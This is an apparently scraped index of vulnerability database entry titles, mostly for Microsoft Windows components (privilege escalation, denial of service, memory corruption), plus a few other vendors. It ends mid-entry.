[8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4227] Microsoft Windows Netlogon RPC Service denial of service [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4181] Microsoft Windows RPC Processor privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3370] Microsoft Windows RPC Authentication denial of service [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2310] Microsoft Windows 2000 RPC weak authentication [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1349] Microsoft Windows 2000/XP SP1 RPC Message Queue memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [900] Microsoft Windows grpconv.exe memory corruption [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [331] Microsoft Windows 2000/XP RPCSS race condition [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service [176821] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer Service permission [176798] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer cachecleaner.dll uncontrolled search path [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176667] McAfee Data Loss Prevention on Windows ePO Administrator Extension cross site scripting [176519] Microsoft Malware Protection Engine unknown vulnerability [176516] Microsoft Malware Protection Engine denial of service [176504] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176503] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [176502] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176501] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176489] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176488] Microsoft Outlook 2013 RT SP1/2013 SP1/2016/2019 unknown vulnerability [176487] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176481] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176480] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176479] Microsoft Office Excel unknown vulnerability [176478] Microsoft Visual Studio Code Kubernetes Tools unknown vulnerability [176475] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176350] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176349] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176060] Backdoor.Win32.NerTe.772 Service Port 21 C:\WINDOWS\scanregs.exe improper authentication [176058] Backdoor.Win32.NerTe.772 Service Port 21 